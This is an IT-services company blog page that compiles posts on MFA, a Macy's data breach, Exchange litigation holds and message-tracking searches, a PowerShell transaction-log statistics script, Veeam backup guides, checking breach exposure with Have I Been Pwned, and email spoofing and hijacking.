Data Security News

Why are you here?

This is your stop for data security news and trends.

Security by design, not by addon's

Organizations now aim to be secure by design

For many years, organizations would build technology solutions and then ‘bolt on’ security mechanisms and protections as an afterthought. This would often lead to deployment delays and additional costs. Organizations then shifted towards ‘building in’ security at various stages along the way. The security team was engaged periodically during development, but cybersecurity was still ‘tagged on’ at the end.

This mindset is changing yet again. With business leaders now confident digital is here to stay, they’re also recognizing they must be secure by design.

What’s the organizational impact?

This change in mindset is happening at various levels throughout the organization.

Business leaders are recognizing that cybersecurity must be aligned to their overall business goals and, moreover, that they must be cybersecurity-conscious at every point in their digital transformation journey.

Cybersecurity is being built-in as technologies and applications are conceptualized, designed, adopted, and built. DevOps and security operations teams are beginning to work more closely – as a DevSecOps team – creating the tools that enable secure digital transformation.

Increasingly, cybersecurity is being seen as an enabler of the business and we expect to see closer collaboration between cybersecurity and all levels of the organization.


Contact us at IDSS to setup a call or to discuss this in detail. We are here to help you protect your company from data breaches.

Why use Multi-Factor Authentication

The vast majority of data breaches have occurred through compromised authentication.  Although having a strong password is an important part of security, this is only one step to securing your network and data.  That’s why multi-factor authentication is so important and why security experts today are strongly recommending it for critical business systems.


Multi-factor authentication (MFA) is a method of computer access control in which a user is granted access only after successfully presenting at least two separate pieces of evidence to an authentication mechanism – typically of the following categories:

    knowledge (something they know)
    possession (something they have)
    inherence (something they are)

A common example of this is having a password and a one-time token or PIN that is provided via software on your smart phone or via a text message.  Without having both pieces of information, a user would not be able to log in successfully.  Many organizations today offer MFA, including Google, PayPal and most financial institutions.  

We use MFA at Lanspeed and we strongly encourage our clients to look into this as well for their mission-critical applications that contain sensitive information.  This significantly reduces the risk of an unwanted party accessing your most important systems and adds a layer of security that is hard to breach.

In my experience, many businesses aren’t aware of the many ways in which they need to protect their network. Contact IDSS to ensure you are asking the most important questions you should be asking about your network to make sure your systems are properly maintained and protected.


ref: source

Macy's breach exposed customer data

Some Macy's online customers became victims of data theft, including their credit card numbers, following a breach in the retailer's security.

The breach took place between April 26 and June 12, during which time an "unauthorized third party" managed to obtain usernames and passwords and then log onto Macy's and Bloomingdale's shoppers' online profiles, the company said in a letter sent July 2 to the New Hampshire Attorney General's Office and first reported by DataBreaches. Macy's owns Bloomingdale's.

The leaked info may include customers' names, addresses, phone numbers, email addresses, birthdays, and credit and debit card numbers with expiration dates. However, the company noted that neither Credit Verification Values (CVV) nor Social Security numbers are stored on its online customer profiles. Macy's said it reported the exposed card numbers to Visa, Mastercard, American Express and Discover.

Profiles with suspicious login activity were blocked until the customers changed their passwords, Macy's said.

"We have investigated the matter thoroughly, addressed the cause and, as a precaution, have implemented additional security measures," the company said in a statement. "Macy's, Inc. will provide consumer protection services at no cost to those customers. We have contacted potentially impacted customers with more information about these services."

The total number of accounts accessed wasn't released, but the letter noted that 753 New Hampshire residents were affected. Macy's attached to the letter a document dated June 27 that was apparently sent to affected customers.

Last month, Adidas' US site fell victim to a similar breach. Its initial investigation suggested that some people's contact information, usernames and encrypted passwords were stolen.




Litigation Hold - Email Inbox

In Exchange 2010 and Exchange Online, we introduced Litigation Hold to allow you to immutably preserve mailbox content to meet long term preservation and eDiscovery requirements. When a mailbox is placed on Litigation Hold, mailbox content is preserved indefinitely.

Placing a mailbox on Litigation Hold You can place a mailbox on Litigation Hold by using the Exchange Administration Center (EAC) or the Shell (set the LitigationHoldEnabled parameter). In Exchange 2010, you can also use the Exchange Management Console (EMC) to do this.

Figure 1: Enabling Litigation Hold for a mailbox using the EAC in Exchange 2013 and Exchange Online

Figure 2: Adding a note and a URL to inform & educate users placed on Litigation Hold

Preserving items for a specified duration To preserve items for a specified period, we added the LitigationHoldDuration parameter to Exchange Online. This helps you meet your compliance needs by preserving all items in a mailbox for the specified duration, calculated from the date the item was created (date received in case of inbound email). For example, if your organization needs to preserve all mailbox data for seven years, you can place all mailboxes on Litigation Hold and set the LitigationHoldDuration to 7 years (in days).

This functionality is also available in Exchange 2013, allowing you to preserve items for a specified duration in your on-premises organization – one example of how developments in Exchange Online benefit Exchange Server on-premises.

In-Place Hold in Exchange 2013 and Exchange Online

In Exchange 2013 and the new Exchange Online, we introduced In-Place Hold, which allows more flexibility in preserving your data. Hold functionality is integrated with In-Place eDiscovery to allow you to search and preserve using a single wizard or a single cmdlet (New-MailboxSearch). You can use the In-Place eDiscovery & Hold wizard or the cmdlet to search for and preserve items matching your query parameters, known as a query-based In-Place Hold, preserve items for a specified period, known as a time-based hold, and also preserve everything indefinitely, which emulates the old Litigation Hold feature. Check out In-Place eDiscovery and In-Place Hold in the New Exchange - Part I and Part II for more info.

Using Litigation Hold in Exchange 2013 and Exchange Online

If you tried placing a mailbox on Litigation Hold using the EAC or the Shell, both the interfaces displayed an alert message with a recommendation to switch to the new In-Place Hold feature. This recommendation was also reflected in the product documentation.

Figure 3: Warning displayed when using Litigation Hold in the EAC in Exchange 2013

Litigation Hold isn't going away: Since the release of Exchange 2013 and the new Exchange Online, we've received a lot of questions and feedback from you about whether Litigation Hold will be removed. We want to clarify that we do not plan to remove Litigation Hold from Exchange Online or Exchange 2013. We've removed the alert from Exchange Online and in Exchange 2013 SP1. We've also removed the recommendation from Exchange Online and Exchange 2013 documentation.

Use the hold feature that best meets your needs

You can use either hold feature to preserve mailbox data in Exchange 2013 and Exchange Online, based on your preservation needs. Here are some scenarios to help you choose between the two holds.

You want to… Use Litigation Hold Use In-Place Hold
Preserve all items in a mailbox Yes Yes.
To preserve all items, don’t specify any query parameters.
Preserve all items in a mailbox for a specific duration Yes.
Specify the LitigationHoldDuration parameter for the mailbox using the Shell.
Create a time-based In-Place Hold. Specify the duration in the In-Place Hold settings in EAC or ItemHoldDuration parameter from the Shell.
Preserve items matching query parameters No.
Litigation Hold preserves all items.
Create a query-based In-Place Hold. Specify query parameters such as start date, end date, sender, recipients and keywords.
Specify types of items to preserve (such as email, calendar, notes) No.
Litigation Hold preserves all items.
You can use the EAC or the MessageTypes parameter from the Shell.
Specify hold settings for members of a distribution group Yes.
Use the Get-DistributionGroupMembercmdlet in the Shell to pipe distribution group members to the Set-Mailbox cmdlet.1
Easily specify distribution groups in the In-Place eDiscovery and Hold wizard in the EAC or in the SourceMailboxes parameter in the Shell. 2
Max users on hold No.
Litigation Hold is a mailbox parameter. No maximum limits apply. You can use the Shell to quickly place all users in an organization on hold.
You can specify a maximum of 10,000 users per In-Place Hold object. To place additional users on hold, you must create another hold.
Place multiple holds on a mailbox No Yes.
You can place a user on multiple In-Place Holds, for example when a user is subject to multiple investigations or legal cases.
Make mailboxes inactive to preserve data in Exchange Online Yes3 Yes
Archive Lync conversations and meeting content to Exchange Yes Yes

1 Distribution group is expanded when you run the command. Future changes to the group require running the command again.
2 Distribution groups are expanded only when you create or refresh the In-Place Hold. Future changes to the group require refreshing the search object.
3 Inactive mailboxes is an Exchange Online feature. The linked documentation is being updated to clarify you can also use Litigation Hold to make a mailbox inactive.




Message Tracking Logs by Sender or Recipient Email

The Get-MessageTrackingLog cmdlet provides two parameters for specifying sender and recipient email addresses as search criteria.

  • -Sender – a single SMTP address for the sender of the email message
  • -Recipients – one or more SMTP addresses for the recipients of the email message

Both parameters are optional, so if they are omitted the search will return all senders, all recipients, or all of both.

To demonstrate the use of these parameters consider the following email message sent from Alan Reid to three recipients.

Searching Message Tracking Logs by Sender Email Address

Because I happen to have sent this test message within the last hour it is not very difficult for me to search for by combining the -Sender parameter with the -Start parameter to search within a time/date range.

[PS] C:\>Get-MessageTrackingLog -Sender -Start (Get-Date).AddHours(-1) EventId Source Sender Recipients MessageSubject ------- ------ ------ ---------- -------------- SUBMIT STORE... {} Payroll report for September RECEIVE SMTP {David.Gower@exchangeserverpro... Payroll report for September DELIVER STORE... {Alex.Heyne@exchangeserverpro.... Payroll report for September DELIVER STORE... {David.Gower@exchangeserverpro... Payroll report for September









[PS] C:\>Get-MessageTrackingLog -Sender -Start (Get-Date).AddHours(-1)


EventId  Source   Sender                            Recipients                        MessageSubject

-------  ------   ------                            ----------                        --------------

SUBMIT   STORE...   {}                                Payroll report for September

RECEIVE  SMTP   {David.Gower@exchangeserverpro... Payroll report for September

DELIVER  STORE...   {Alex.Heyne@exchangeserverpro.... Payroll report for September

DELIVER  STORE...   {David.Gower@exchangeserverpro... Payroll report for September

However, if I were searching over a broader time range I may see more results than I really want to see.

[PS] C:\>Get-MessageTrackingLog -Sender EventId Source Sender Recipients MessageSubject ------- ------ ------ ---------- -------------- SUBMIT STORE... {} Descry turmoil deviance SUBMIT STORE... {} Impending abeyance recitals ba... SUBMIT STORE... {} Egress SUBMIT STORE... {} Presage visceral penurious SUBMIT STORE... {} Stipple voluble blatant stymie SUBMIT STORE... {} Inured SUBMIT STORE... {} Heinous mercurial SUBMIT STORE... {} Relapse smolder SUBMIT STORE... {} Meeting minutes SUBMIT STORE... {} Supine poignant SUBMIT STORE... {} Indigence denigrate swerve vig... SUBMIT STORE... {} Jocular SUBMIT STORE... {} Oblivious apropos condone savant SUBMIT STORE... {} Obdurate splice penitent SUBMIT STORE... {} Extenuate aplomb obtain eulogy SUBMIT STORE... {} Cursory cryptic rescind euphoria SUBMIT STORE... {} Lucubrate ruffian SUBMIT STORE... {} Indigence umbrage SUBMIT STORE... {} Emaciate valiant tractable SUBMIT STORE... {} Volatile fission cajole SUBMIT STORE... {} Concord legacy chisel fagged SUBMIT STORE... {} Egress reconcile contrite cred... SUBMIT STORE... {} Abstruse salacious constrict SUBMIT STORE... {} Unearth recreancy paucity SUBMIT STORE... {} A meeting #1 SUBMIT STORE... {} A meeting #2 SUBMIT STORE... {} Assuage foppish SUBMIT STORE... {} Clamor austere collusion SUBMIT STORE... {} Waffle saturnine ...snip!




































[PS] C:\>Get-MessageTrackingLog -Sender


EventId  Source   Sender                            Recipients                        MessageSubject

-------  ------   ------                            ----------                        --------------

SUBMIT   STORE...   {}                                Descry turmoil deviance

SUBMIT   STORE...   {}                                Impending abeyance recitals ba...

SUBMIT   STORE...   {}                                Egress

SUBMIT   STORE...   {}                                Presage visceral penurious

SUBMIT   STORE...   {}                                Stipple voluble blatant stymie

SUBMIT   STORE...   {}                                Inured

SUBMIT   STORE...   {}                                Heinous mercurial

SUBMIT   STORE...   {}                                Relapse smolder

SUBMIT   STORE...   {}                                Meeting minutes

SUBMIT   STORE...   {}                                Supine poignant

SUBMIT   STORE...   {}                                Indigence denigrate swerve vig...

SUBMIT   STORE...   {}                                Jocular

SUBMIT   STORE...   {}                                Oblivious apropos condone savant

SUBMIT   STORE...   {}                                Obdurate splice penitent

SUBMIT   STORE...   {}                                Extenuate aplomb obtain eulogy

SUBMIT   STORE...   {}                                Cursory cryptic rescind euphoria

SUBMIT   STORE...   {}                                Lucubrate ruffian

SUBMIT   STORE...   {}                                Indigence umbrage

SUBMIT   STORE...   {}                                Emaciate valiant tractable

SUBMIT   STORE...   {}                                Volatile fission cajole

SUBMIT   STORE...   {}                                Concord legacy chisel fagged

SUBMIT   STORE...   {}                                Egress reconcile contrite cred...

SUBMIT   STORE...   {}                                Abstruse salacious constrict

SUBMIT   STORE...   {}                                Unearth recreancy paucity

SUBMIT   STORE...   {}                                A meeting #1

SUBMIT   STORE...   {}                                A meeting #2

SUBMIT   STORE...   {}                                Assuage foppish

SUBMIT   STORE...   {}                                Clamor austere collusion

SUBMIT   STORE...   {}                                Waffle saturnine



So in the case where I want to search a broader time window, but see fewer irrelevant results, I can combine the -Sender and -Recipients parameters in my search command.

Searching Message Tracking Logs by Recipient Email Address

It doesn't matter whether the recipient was in the To, CC, or BCC of the message, the search will return any match regardless. Here the “Payroll report for September” email shown above is found even though Alex Heyne was one of several recipients and was in the CC field.

[PS] C:\>Get-MessageTrackingLog -Sender -Recipients EventId Source Sender Recipients MessageSubject ------- ------ ------ ---------- -------------- RECEIVE SMTP {David.Gower@exchangeserverpro... Payroll report for September DELIVER STORE... {Alex.Heyne@exchangeserverpro.... Payroll report for September







[PS] C:\>Get-MessageTrackingLog -Sender -Recipients


EventId  Source   Sender                            Recipients                        MessageSubject

-------  ------   ------                            ----------                        --------------

RECEIVE  SMTP   {David.Gower@exchangeserverpro... Payroll report for September

DELIVER  STORE...   {Alex.Heyne@exchangeserverpro.... Payroll report for September

You can specify multiple recipient SMTP addresses simply by separating them with a comma. When you do this the condition is an “or” not an “and”. In other words, any messages with any one of the recipients will be returned in the results, they do not need to be messages sent to all the recipients.

Here both the payroll email sent to Alex and David, as well as another email sent only to David, are returned in the same results.

[PS] C:\>Get-MessageTrackingLog -Sender -Recipients, EventId Source Sender Recipients MessageSubject ------- ------ ------ ---------- -------------- RECEIVE SMTP {David.Gower@exchangeserverpro... Payroll report for September DELIVER STORE... {Alex.Heyne@exchangeserverpro.... Payroll report for September DELIVER STORE... {David.Gower@exchangeserverpro... Payroll report for September RECEIVE SMTP {David.Gower@exchangeserverpro... Also how about lunch? DELIVER STORE... {David.Gower@exchangeserverpro... Also how about lunch?










[PS] C:\>Get-MessageTrackingLog -Sender -Recipients,


EventId  Source   Sender                            Recipients                        MessageSubject

-------  ------   ------                            ----------                        --------------

RECEIVE  SMTP   {David.Gower@exchangeserverpro... Payroll report for September

DELIVER  STORE...   {Alex.Heyne@exchangeserverpro.... Payroll report for September

DELIVER  STORE...   {David.Gower@exchangeserverpro... Payroll report for September

RECEIVE  SMTP   {David.Gower@exchangeserverpro... Also how about lunch?

DELIVER  STORE...   {David.Gower@exchangeserverpro... Also how about lunch?


Searching Message Tracking Logs for Wildcard Values or Partial Matches

Unfortunately wildcard searches are not allowed with the -Sender and -Recipient parameters.

For example, this will return no results.

[PS] C:\>Get-MessageTrackingLog -Recipients *


[PS] C:\>Get-MessageTrackingLog -Recipients *

However, you can use wildcards if you pipe the output of Get-MessageTrackingLog into Where-Object instead.

In this situation it is wise to limit the search to a specific date range for better performance. Or, if you do need to search the entire set of log files remember to use “-Resultsize Unlimited”.

[PS] C:\>Get-MessageTrackingLog -Start (Get-Date).AddHours(-1) | Where-Object {$_.recipients -like "*"} EventId Source Sender Recipients MessageSubject ------- ------ ------ ---------- -------------- RECEIVE STORE... {} Email to the internet! TRANSFER ROUTING {} Email to the internet! SEND SMTP {} Email to the internet!








[PS] C:\>Get-MessageTrackingLog -Start (Get-Date).AddHours(-1) | Where-Object {$_.recipients -like "*"}


EventId  Source   Sender                            Recipients                        MessageSubject

-------  ------   ------                            ----------                        --------------

RECEIVE  STORE...   {}     Email to the internet!

TRANSFER ROUTING   {}     Email to the internet!

SEND     SMTP   {}     Email to the internet!

You can see that the wildcard is used with the -like comparison operator, but another technique is to use the -match comparison operator which doesn't require the wildcard character.

[PS] C:\>Get-MessageTrackingLog -Start (Get-Date).AddHours(-1) | Where-Object {$_.recipients -match "gmail"} EventId Source Sender Recipients MessageSubject ------- ------ ------ ---------- -------------- RECEIVE STORE... {} Email to the internet! TRANSFER ROUTING {} Email to the internet! SEND SMTP {} Email to the internet!








[PS] C:\>Get-MessageTrackingLog -Start (Get-Date).AddHours(-1) | Where-Object {$_.recipients -match "gmail"}


EventId  Source   Sender                            Recipients                        MessageSubject

-------  ------   ------                            ----------                        --------------

RECEIVE  STORE...   {}     Email to the internet!

TRANSFER ROUTING   {}     Email to the internet!

SEND     SMTP   {}     Email to the internet!

The same use of Where-Object with -like or -match also applies to the sender email address.


As you can see the -Sender and -Recipients parameters give us some flexibility when searching message tracking logs. However in some cases we need to use the more powerful capabilities of Where-Object for wildcard and partial string matching.




Analyzing Exchange Transaction Log Generation Stat


When designing a site resilient Exchange Server solution, one of the required planning tasks is to determine how many transaction logs are generated on an hourly basis. This helps figure out how much bandwidth will be required when replicating database copies between sites, and what the effects will be of adding additional database copies to the solution. If designing an Exchange solution using the Exchange Server Role Requirements Calculator, the percent of logs generated per hour is an optional input field.

Previously, the most common method of collecting this data involved taking captures of the files in each log directory on a scheduled basis (using dir, Get-ChildItem, or CollectLogs.vbs). Although the log number could be extracted by looking at the names of the log files, there was a lot of manual work involved in figuring out the highest the log generation from each capture, and getting rid of duplicate entries. Once cleaned up, the data still had to be analyzed manually using a spreadsheet or a calculator. Trying to gather data across multiple servers and databases further complicated matters.

To improve upon this situation, I decided to write an all-in-one script that could collect transaction log statistics, and analyze them after collection. The script is called GetTransactionLogStats.ps1. It has two modes: Gather and Analyze. Gather mode is designed to be run on an hourly basis, on the top of the hour. When run, it will take a single set of snapshots of the current log generation number for all configured databases. These snapshots will be sent, along with the time the snapshots were taken, to an output file, LogStats.csv. Each subsequent time the script is run in Gather mode, another set of snapshots will be appended to the file. Analyze mode is used to process the snapshots that were taken in Gather mode, and should be run after a sufficient amount of snapshots have been collected (at least 2 weeks of data is recommended). When run, it compares the log generation number in each snapshot to the previous snapshot to determine how many logs were created during that period.

Script Features

Less Data to Collect

Instead of looking at the files within log directories, the script uses Perfmon to get the current log file generation number for a specific database or storage group. This number, along with the time it was obtained, is the only information kept in the output log file, LogStats.csv. The performance counters that are used are as follows:

Exchange 2013/2016

MSExchangeIS HA Active Database\Current Log Generation Number

Exchange 2010

MSExchange Database ==> Instances\Log File Current Generation

Note: The counter used for Exchange 2013/2016 contains the active databases on that server, as well as any now passive databases that had been activated on that server at some point since the last reboot. The counter used for Exchange 2010 contains all databases on that server, including all passive copies. To only get data from active databases, make sure to manually specify the databases for that server in the TargetServers.txt file. Alternately you can use the DontAnalyzeInactiveDatabases parameter when performing the analysis to exclude databases that did not increment their log count.

Multi Server/Database Support

The script takes a simple input file, TargetServers.txt, where each line in the file specifies the server, or server and databases to process. If you want to get statistics for all databases on a server, only the server name is necessary. If you want to only get a subset of databases on a server (for instance if you wanted to omit secondary copies on an Exchange 2010 server), then you can specify the server name, followed by each database you want to process.

Built In Analysis Capability

The script has the ability to analyze the output log file, LogStats.csv, that was created when run in Gather mode. It does a number of common calculations for you, but also leaves the original data in case any other calculations need to be done. Output from running in Analyze mode is sent to multiple .CSV files, where one file is created for each database, and one more file is created containing the average statistics for all analyzed databases. The following columns are added to the CSV files:

  • Hour: The hour that log stats are being gathered for. Can be between 0 – 23.
  • TotalLogsCreated: The total number of logs created during that hour for all days present in LogStats.csv.
  • TotalSampleIntervalSeconds: The total number of seconds between each valid pair of samples for that hour. Because the script gathers Perfmon data over the network, the sample interval may not always be exactly one hour.
  • NumberOfSamples: The number of times that the log generation was sampled for the given hour.
  • AverageSample: The average number of logs generated for that hour, regardless of sample interval size. Formula: TotalLogsCreated / NumberOfSamples.
  • PercentDailyUsage: The percent of all logs that that particular hour accounts for. Formula: LogsCreatedForHour / LogsCreatedForAllHours * 100.
  • PercentDailyUsageForCalc: The ratio of all logs for this hour compared to all logs for all hours. Formula: LogsCreatedForHour / LogsCreatedForAllHours.
  • verageSamplePer60Minutes: Similar to AverageSample, but adjusts the value like each sample was taken exactly 60 minutes apart. Formula: TotalLogsCreated / TotalSampleIntervalSeconds * 3600.

Database Heat Map

As of version 2.0, this script now also generates a database heat map when run in Analyze mode. The heat map shows how many logs were generated for each database during the duration of the collection. This information can be used to figure out if databases, servers, or entire Database Availability Groups, are over or underutilized compared to their peers.

The database heat map consists of two files:

HeatMap-AllCopies.csv: A heat map of all tracked databases, including databases that may have failed over during the collection duration, and were tracked on multiple servers. This heat map shows the server specific instance of each database. Example:


HeatMap-DBsCombined.csv: A heat map containing only a single instance of each unique database. In cases where multiple copies of the same database had generated logs, the log count from each will be combined into a single value. Example:



The script has the following requirements;

  • Target Exchange Servers must be running Exchange 2010, 2013, or 2016
  • PowerShell Remoting must be enabled on the target Exchange Servers, and configured to allow connections from the machine where the script is being executed.


The script has the following parameters:

  • -Gather: Switch specifying we want to capture current log generations. If this switch is omitted, the -Analyze switch must be used.
  • -Analyze: Switch specifying we want to analyze already captured data. If this switch is omitted, the -Gather switch must be used.
  • -ResetStats: Switch indicating that the output file, LogStats.csv, should be cleared and reset. Only works if combined with –Gather.
  • -WorkingDirectory: The directory containing TargetServers.txt and LogStats.csv. If omitted, the working directory will be the current working directory of PowerShell (not necessarily the directory the script is in).
  • -LogDirectoryOut: The directory to send the output log files from running in Analyze mode to. If omitted, logs will be sent to WorkingDirectory.
  • -MaxSampleIntervalVariance: The maximum number of minutes that the duration between two samples can vary from 60. If we are past this amount, the sample will be discarded. Defaults to a value of 10.
  • -MaxMinutesPastTheHour: How many minutes past the top of the hour a sample can be taken. Samples past this amount will be discarded. Defaults to a value of 15.
  • -MonitoringExchange2013: Whether there are Exchange 2013/2016 servers configured in TargetServers.txt. Defaults to $true. If there are no 2013/2016 servers being monitored, set this to $false to increase performance.
  • -DontAnalyzeInactiveDatabases: When running in Analyze mode, this specifies that any databases that have been found that did not generate any logs during the collection duration will be excluded from the analysis. This is useful in excluding passive databases from the analysis.


Runs the script in Gather mode, taking a single snapshot of the current log generation of all configured databases:

PS C:\> .\GetTransactionLogStats.ps1 -Gather

Runs the script in Gather mode, and indicates that no Exchange 2013/2016 servers are configured in TargetServers.txt:

PS C:\> .\GetTransactionLogStats.ps1 -Gather -MonitoringExchange2013 $false

Runs the script in Gather mode, and changes the directory where TargetServers.txt is located, and where LogStats.csv will be written to:

PS C:\> .\GetTransactionLogStats.ps1 -Gather -WorkingDirectory "C:\GetTransactionLogStats" -ResetStats

Runs the script in Analyze mode:

PS C:\> .\GetTransactionLogStats.ps1 -Analyze

Runs the script in Analyze mode, and excludes database copies that did not generate any logs during the collection duration:

PS C:\> .\GetTransactionLogStats.ps1 -Analyze -DontAnalyzeInactiveDatabases $true

Runs the script in Analyze mode, sending the output files for the analysis to a different directory. Specifies that only sample durations between 55-65 minutes are valid, and that each sample can be taken a maximum of 10 minutes past the hour before being discarded:

PS C:\> .\GetTransactionLogStats.ps1 -Analyze -LogDirectoryOut "C:\GetTransactionLogStats\LogsOut" -MaxSampleIntervalVariance 5 -MaxMinutesPastTheHour 10

Example TargetServers.txt

The following example shows what the TargetServers.txt input file should look like. For the server1 and server3 lines, no databases are specified, which means that all databases on the server will be sampled. For the server2 and server4 lines, we will only sample the specified databases on those servers. Note that no quotes are necessary for databases with spaces in their names.


Output File After Running in Gather Mode

When run in Gather mode, the log generation snapshots that are taken are sent to LogStats.csv. The following shows what this file looks like:


Output File After Running in Analyze Mode

The following shows the analysis for a single database after running the script in Analyze mode:


Running As a Scheduled Task

Since the script is designed to be run an hourly basis, the easiest way to accomplish that is to run the script via a Scheduled Task. The way I like to do that is to create a batch file which calls Powershell.exe and launches the script, and then create a Scheduled Task which runs the batch file. The following is an example of the command that should go in the batch file:

powershell.exe -noninteractive -noprofile -command "& {C:\LogStats\GetTransactionLogStats.ps1 -Gather -WorkingDirectory C:\LogStats}"

In this example, the script, as well as TargetServers.txt, are located in C:\LogStats. Note that I specified a WorkingDirectory of C:\LogStats so that if the Scheduled Task runs in an alternate location (by default C:\Windows\System32), the script knows where to find TargetServers.txt and where to write LogStats.csv. Also note that the command does not load any Exchange snapin, as the script doesn’t use any Exchange specific commands.


The following information only applies to versions of this script older than 2.0:

  • By default, the Windows Firewall on an Exchange 2013 server running on Windows Server 2012 does not allow remote Perfmon access. I suspect this is also the case with Exchange 2013 running on Windows Server 2008 R2, but haven’t tested. If either of the below errors are logged, you may need to open the Windows Firewall on these servers to allow access from the computer running the script.

ERROR: Failed to read perfmon counter from server SERVERNAME

ERROR: Failed to get perfmon counters from server SERVERNAME


After noticing that multiple people were having issues getting this to work through the Windows Firewall, I tried enabling different combinations of built in firewall rules until I could figure out which ones were required. I only tested on an Exchange 2013 server running on Windows Server 2012, but this should apply to other Windows versions as well. The rules I had to enable were:

File and Printer Sharing (NB-Datagram-In)

File and Printer Sharing (NB-Name-In)

File and Printer Sharing (NB-Session-In)

Mike Hendrickson


  • 11/5/2013 added a section on firewall rules to try.
  • 7/17/2014 added a section on running as a scheduled task.
  • 3/28/2016 Version 2.0:
    • Instead of running Get-Counter -ComputerName to remotely access Perfmon counters, the script now uses PowerShell Remoting, specifically Invoke-Command -ComputerName, so that all counter collection is done locally on each target server. This significantly speeds up the collection duration.
    • The script now supports using the -Verbose switch to provide information during script execution.
    • Per Thomas Stensitzki's script variation, added in functionality so that DateTime's can be properly parsed on non-English (US) based computers.
    • Added functionality to generate a database heat map based on log usage.
  • 6/22/2016 Version 2.1:
    • When run in -Gather mode, the script now uses Test-WSMan against each target computer to verify Remote PowerShell connectivity prior to doing the log collection.
    • Added new column to log analysis files, PercentDailyUsageForCalc, which allows for direct copy/paste into the Exchange Server Role Requirements Calculator. Additionally, the script will try to ensure that all rows in the column add up to exactly 1 (requires samples from all 24 hours of the day).
    • Significantly increased performance of analysis operations.



Veeam - Data Recover

Data Recovery

Veeam Backup & Replication offers a number of recovery options for various disaster recovery scenarios:

  • Instant VM Recovery enables you to instantly start a VM directly from a backup file
  • Entire VM recovery enables you to recover a VM from a backup file to its original or another location
  • VM files restore enables you to recover separate VM files (virtual disks, configuration files and so on)
  • Guest OS File Recovery enables you to recover individual guest OS files from Windows, Linux, Mac and other guest OS file systems.

Veeam Backup & Replication uses the same image-level backup for all data recovery operations. You can restore VMs, VM files and individual guest OS files to the most recent state or to any available restore point.

To view and recover Microsoft Active Directory, Microsoft SQL Server, Microsoft SharePoint, Microsoft Exchange or Oracle application items, you can use the capabilities of Veeam Backup Explorers. For more information, see Veeam Backup Explorers User Guide.



Veeam - Create a Backup Job Guide

Creating Backup Jobs

To back up VMs, you must configure a backup job. The backup job defines how, where and when to back up VM data. One job can be used to process one or more VMs.

You can configure a backup job and start it immediately or save the job and run it later. Jobs can be started manually or scheduled to run automatically at specific time.

Before creating a backup job, check prerequisites. Then use the New Backup Job wizard to configure the backup job.

  1. Launch the New Backup Job wizard
  2. Specify job name and description
  3. Select VMs to back up
  4. Exclude objects from the backup job
  5. Define VM backup order
  6. Specify backup storage settings
  7. Specify advanced backup settings
  8. Specify secondary target
  9. Specify guest processing settings
  10. Define the job schedule
  11. Finish working with the wizard



Veeam Email Configuration - Guide

Configuring Global Email Notification Settings

To configure global email notification settings:

  1. From the main menu, select General Options.
  2. Open the E-mail Settings tab.
  3. Select the Enable e-mail notifications check box.
  4. In the SMTP server field, enter a full DNS name or IP address of the SMTP server that will be used for sending email notifications.
  5. Click the Advanced button to specify user credentials and connection options:
  1. Specify the port number and connection timeout for the SMTP server.
  2. To use a secure connection for email operations, select the Connect using SSL check box.
  3. If you need to connect to the SMTP server using a specific account, select the This SMTP server requires authentication check box and select the necessary credentials from the Log on as list. If you have not set up credentials beforehand, click the Manage accounts link or click Add on the right to add credentials. For more information, see Managing Credentials.
  1. In the From field, specify an email from which email notifications must be sent.
  2. In the To field, specify the recipient address(es). Use a semicolon to separate multiple addresses. Recipient(s) specified in this field will receive notification about every job managed by the backup server. You can leave the field empty if required.

For every particular job, you can specify additional recipients. For more information, see Configuring Job Notification Settings.

  1. In the Subject field, specify a subject for the sent message. You can use the following variables in the subject:
  1. %Time% — completion time
  2. %JobName%
  3. %JobResult%
  4. %VmCount% — number of VMs in the job
  5. %Issues% — number of VMs in the job that have been processed with the Warning or Failed status
  1. Select the Notify on success, Notify on warning and/or Notify on failure check boxes to receive email notification if a job is run successfully, not successfully or with a warning.
  2. Select the Suppress notifications until the last retry check box to receive a notification about the final job status. If you do not enable this option, Veeam Backup & Replication will send one notification per every job retry.
  3. Veeam Backup & Replication allows sending a test email to check if all settings have been configured correctly. To send a test email, click Test Message.

Configuring Global Email Notification Settings



Checking to see if you have been hacked

Data breaches are becoming all too common these days, with the latest affecting 150 million users of calorie-counting app MyFitnessPal.

Don't worry if your account has been hacked, just take a deep breath and follow this simple guide

But help is at hand.

You can check if you've been hacked, often called being "pwned", and bolster your account security by following these simple steps.

What is Have I Been Pwned?

The most popular site for checking if your email address, and other accounts tied to it, has been hacked is Have I Been Pwned.

Here you can safely enter your email address and the site will check it against multiple data breach incidents.


If your worried your email account has been hacked, your first port of call should be the Have I Been Pwned website

If your account details were included in one of those breaches, the site will tell you with the message "oh no – pwned" flashing up on screen.

It will also give you information on the breach and the type of data that was compromised, such as email addresses and passwords, and which service it was linked to.

The site only asks for your email address, so you don't need to worry about handing over passwords and other sensitive info.

Just enter your email into the search bar, and click the "pwned?" button next to it.

The results will then appear on the corresponding page.

Always set a unique password for your email, and make sure you don't repeat it anywhere else

What should i do if my account has been pwned?

If you're met with bad news, your first move should be to change your login password for the affected account.

You should also do the same for the service that was hit by the breach.

Even if your email itself hasn't been the victim of a breach, there's security risk if another account that you log into with the same password has been affected.

In an ideal world, we'd use different passwords across all the platforms we're signed up to.

But with apps and social networks piling up, it's easy to fall back on the same login info to avoid confusion.

But at the very least, you should have a strong, unique password for logging into your email.


Contact IDSS to help !


Thank you, 

Emails are Sending FROM Me, but it isn't me! Help

John Doe is “ getting returns of emails I didn’t send… How do I prevent this?”

What’s worse than getting spam? Unwittingly sending it. When bogus and probably malware-laden advertising goes out in your name, you look bad. And you get flooded with bounced messages from dead addresses that some crook attempted to spam in your name.

The good news: You’re not sending out spam. Neither is your computer or your IP address. But the bad news can still be pretty bad.

If spam is going out from your email address, the address has been either spoofed or hijacked. Either way, the spam isn’t going out from your computer, and probably not from the criminal’s computer, either. It’s probably going out from an unknowing victim’s malware-infected PC. That has your contact information saved on it.

Spoofing an email address is, in a sense, forging it. The criminal sends out mail with your FROM address, even though they have no access to your account.

There’s really no solution to spoofing. Fortunately, for their own reasons, cybercrooks tend to change spoofed addresses frequently. The annoyance will disappear soon.

Hijacking is worse. In this case, the criminal takes control of your account. They can read your mail, and they can target people you know when they spam. And they can lock you out of your own account.

Fortunately, you can do something about hijacking.

As soon as you discover that your address is spamming people, try to change your password…immediately. If you succeed, you’ve fixed the problem.

But if your mail service rejects your password, the problem is serious. The hijacker has changed the password first and now controls your account.

